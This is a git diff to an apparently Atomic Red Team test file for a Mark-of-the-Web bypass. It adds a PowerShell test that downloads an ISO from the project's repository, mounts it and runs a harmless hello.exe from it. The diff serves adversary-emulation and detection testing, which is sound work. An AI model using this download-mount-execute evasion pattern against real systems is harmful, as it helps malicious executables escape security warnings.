diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml
index 000674c5..63f1ffe5 100644
--- a/atomics/T1553.005/T1553.005.yaml
+++ b/atomics/T1553.005/T1553.005.yaml
@@ -11,7 +11,7 @@ atomic_tests:
     path_of_iso:
       description: Path to ISO file
       type: path
-      default: PathToAtomicsFolder\T1553.005\src\T1553.005.iso
+      default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -20,11 +20,41 @@ atomic_tests:
       if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
-      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/src/T1553.005.iso -OutFile "#{path_of_iso}"
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
   executor:
     command: |
       Mount-DiskImage -ImagePath "#{path_of_iso}"
     cleanup_command: |
-      Dismount-DiskImage -ImagePath "#{path_of_iso}"
+      Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
     name: powershell
 
+- name: Mount an ISO image and run executable from the ISO
+  description: |-
+    Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. 
+    Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". 
+    ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,  
+  supported_platforms:
+  - windows
+  input_arguments:
+    path_of_iso:
+      description: Path to ISO file
+      type: path
+      default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+    prereq_command: |
+      if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+  executor:
+    command: |
+      $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+      $driveLetter = ($keep | Get-Volume).DriveLetter
+      invoke-item "$($driveLetter):\hello.exe"
+    cleanup_command: |
+      Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+      Stop-process -name "hello" -Force -ErrorAction ignore
+    name: powershell
\ No newline at end of file
diff --git a/atomics/T1553.005/bin/FeelTheBurn.iso b/atomics/T1553.005/bin/FeelTheBurn.iso
new file mode 100644
index 00000000..491da79f
Binary files /dev/null and b/atomics/T1553.005/bin/FeelTheBurn.iso differ
diff --git a/atomics/T1553.005/src/T1553.005.iso b/atomics/T1553.005/bin/T1553.005.iso
similarity index 100%
rename from atomics/T1553.005/src/T1553.005.iso
rename to atomics/T1553.005/bin/T1553.005.iso